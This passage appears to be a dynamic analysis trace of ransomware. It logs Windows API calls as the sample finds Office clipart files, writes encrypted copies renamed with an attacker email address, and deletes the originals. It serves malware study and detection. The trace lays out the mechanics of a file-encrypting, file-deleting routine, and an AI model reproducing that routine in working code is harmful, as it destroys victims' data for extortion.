(lpString1=".pdf", lpString2=".WMF") returned -1 [0053.736] lstrlenW (lpString=".xls") returned 4 [0053.736] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.737] lstrlenW (lpString=".xlsx") returned 5 [0053.737] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.737] lstrlenW (lpString=".ppt") returned 4 [0053.737] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0053.737] lstrlenW (lpString=".zip") returned 4 [0053.737] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.737] lstrlenW (lpString=".rar") returned 4 [0053.737] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.737] lstrlenW (lpString=".bz2") returned 4 [0053.737] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.737] lstrlenW (lpString=".7z") returned 3 [0053.737] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0053.737] lstrlenW (lpString=".dbf") returned 4 [0053.737] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0053.737] lstrlenW (lpString=".1cd") returned 4 [0053.737] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 63 [0053.737] lstrlenW (lpString=".jpg") returned 4 [0053.737] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.246] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.254] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.254] GetLastError () returned 0x0 [0054.254] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1d74, lpOverlapped=0x0) returned 1 [0054.304] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1d80, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1d80, lpOverlapped=0x0) returned 1 [0054.305] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.305] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.305] SetEndOfFile (hFile=0x230) returned 1 [0054.305] CloseHandle (hObject=0x230) returned 1 [0054.305] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.305] SetEndOfFile (hFile=0x22c) returned 1 [0054.306] CloseHandle (hObject=0x22c) returned 1 [0054.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.306] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf")) returned 1 [0054.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0054.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0054.307] lstrlenW (lpString=".doc") returned 4 [0054.307] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.307] lstrlenW (lpString=".docx") returned 5 [0054.307] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.307] lstrlenW (lpString=".pdf") returned 4 [0054.307] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.307] lstrlenW (lpString=".xls") returned 4 [0054.307] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.307] lstrlenW (lpString=".xlsx") returned 5 [0054.307] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.307] lstrlenW (lpString=".ppt") returned 4 [0054.307] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0054.307] lstrlenW (lpString=".zip") returned 4 [0054.307] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.307] lstrlenW (lpString=".rar") returned 4 [0054.307] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.307] lstrlenW (lpString=".bz2") returned 4 [0054.307] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.307] lstrlenW (lpString=".7z") returned 3 [0054.307] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0054.307] lstrlenW (lpString=".dbf") returned 4 [0054.307] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0054.307] lstrlenW (lpString=".1cd") returned 4 [0054.307] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 63 [0054.307] lstrlenW (lpString=".jpg") returned 4 [0054.307] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.308] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.308] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.308] GetLastError () returned 0x0 [0054.308] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x7e0, lpOverlapped=0x0) returned 1 [0054.309] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0054.310] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.310] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.310] SetEndOfFile (hFile=0x230) returned 1 [0054.310] CloseHandle (hObject=0x230) returned 1 [0054.311] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.311] SetEndOfFile (hFile=0x22c) returned 1 [0054.311] CloseHandle (hObject=0x22c) returned 1 [0054.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.312] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf")) returned 1 [0054.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0054.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0054.312] lstrlenW (lpString=".doc") returned 4 [0054.312] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.312] lstrlenW (lpString=".docx") returned 5 [0054.312] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.312] lstrlenW (lpString=".pdf") returned 4 [0054.312] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.312] lstrlenW (lpString=".xls") returned 4 [0054.312] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.312] lstrlenW (lpString=".xlsx") returned 5 [0054.312] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.312] lstrlenW (lpString=".ppt") returned 4 [0054.312] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0054.312] lstrlenW (lpString=".zip") returned 4 [0054.312] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.312] lstrlenW (lpString=".rar") returned 4 [0054.312] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.312] lstrlenW (lpString=".bz2") returned 4 [0054.312] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.312] lstrlenW (lpString=".7z") returned 3 [0054.312] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0054.313] lstrlenW (lpString=".dbf") returned 4 [0054.313] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0054.313] lstrlenW (lpString=".1cd") returned 4 [0054.313] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 63 [0054.313] lstrlenW (lpString=".jpg") returned 4 [0054.313] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.314] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.314] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.315] GetLastError () returned 0x0 [0054.315] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x9bc, lpOverlapped=0x0) returned 1 [0054.316] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x9c0, lpOverlapped=0x0) returned 1 [0054.317] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.317] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.317] SetEndOfFile (hFile=0x230) returned 1 [0054.318] CloseHandle (hObject=0x230) returned 1 [0054.318] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.318] SetEndOfFile (hFile=0x22c) returned 1 [0054.319] CloseHandle (hObject=0x22c) returned 1 [0054.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.319] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04323_.wmf")) returned 1 [0054.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0054.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0054.320] lstrlenW (lpString=".doc") returned 4 [0054.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.320] lstrlenW (lpString=".docx") returned 5 [0054.320] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.320] lstrlenW (lpString=".pdf") returned 4 [0054.320] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.320] lstrlenW (lpString=".xls") returned 4 [0054.320] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.320] lstrlenW (lpString=".xlsx") returned 5 [0054.320] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.320] lstrlenW (lpString=".ppt") returned 4 [0054.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0054.320] lstrlenW (lpString=".zip") returned 4 [0054.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.320] lstrlenW (lpString=".rar") returned 4 [0054.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.320] lstrlenW (lpString=".bz2") returned 4 [0054.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.320] lstrlenW (lpString=".7z") returned 3 [0054.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0054.320] lstrlenW (lpString=".dbf") returned 4 [0054.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0054.320] lstrlenW (lpString=".1cd") returned 4 [0054.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 63 [0054.320] lstrlenW (lpString=".jpg") returned 4 [0054.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.321] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=3348) returned 1 [0054.321] CloseHandle (hObject=0x22c) returned 1 [0054.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf")) returned 0x20 [0054.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0054.321] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.321] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.321] GetLastError () returned 0x0 [0054.321] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xd14, lpOverlapped=0x0) returned 1 [0054.323] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xd20, lpOverlapped=0x0) returned 1 [0054.324] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.324] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.325] SetEndOfFile (hFile=0x230) returned 1 [0054.325] CloseHandle (hObject=0x230) returned 1 [0054.325] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.325] SetEndOfFile (hFile=0x22c) returned 1 [0054.325] CloseHandle (hObject=0x22c) returned 1 [0054.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.326] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf")) returned 1 [0054.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0054.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0054.326] lstrlenW (lpString=".doc") returned 4 [0054.326] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.326] lstrlenW (lpString=".docx") returned 5 [0054.326] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.326] lstrlenW (lpString=".pdf") returned 4 [0054.326] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.326] lstrlenW (lpString=".xls") returned 4 [0054.326] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.326] lstrlenW (lpString=".xlsx") returned 5 [0054.326] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.326] lstrlenW (lpString=".ppt") returned 4 [0054.326] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0054.326] lstrlenW (lpString=".zip") returned 4 [0054.326] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.326] lstrlenW (lpString=".rar") returned 4 [0054.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.326] lstrlenW (lpString=".bz2") returned 4 [0054.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.327] lstrlenW (lpString=".7z") returned 3 [0054.327] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0054.327] lstrlenW (lpString=".dbf") returned 4 [0054.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0054.327] lstrlenW (lpString=".1cd") returned 4 [0054.327] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0054.327] lstrlenW (lpString=".jpg") returned 4 [0054.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.328] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.328] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.328] GetLastError () returned 0x0 [0054.328] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x10c8, lpOverlapped=0x0) returned 1 [0054.331] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x10d0, lpOverlapped=0x0) returned 1 [0054.332] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.332] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.332] SetEndOfFile (hFile=0x230) returned 1 [0054.332] CloseHandle (hObject=0x230) returned 1 [0054.332] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.332] SetEndOfFile (hFile=0x22c) returned 1 [0054.333] CloseHandle (hObject=0x22c) returned 1 [0054.333] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.333] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf")) returned 1 [0054.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0054.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0054.334] lstrlenW (lpString=".doc") returned 4 [0054.334] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.334] lstrlenW (lpString=".docx") returned 5 [0054.334] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.334] lstrlenW (lpString=".pdf") returned 4 [0054.334] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.334] lstrlenW (lpString=".xls") returned 4 [0054.334] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.334] lstrlenW (lpString=".xlsx") returned 5 [0054.334] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.334] lstrlenW (lpString=".ppt") returned 4 [0054.334] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0054.334] lstrlenW (lpString=".zip") returned 4 [0054.334] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.334] lstrlenW (lpString=".rar") returned 4 [0054.334] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.334] lstrlenW (lpString=".bz2") returned 4 [0054.334] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.334] lstrlenW (lpString=".7z") returned 3 [0054.334] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0054.334] lstrlenW (lpString=".dbf") returned 4 [0054.334] lstrcmpiW 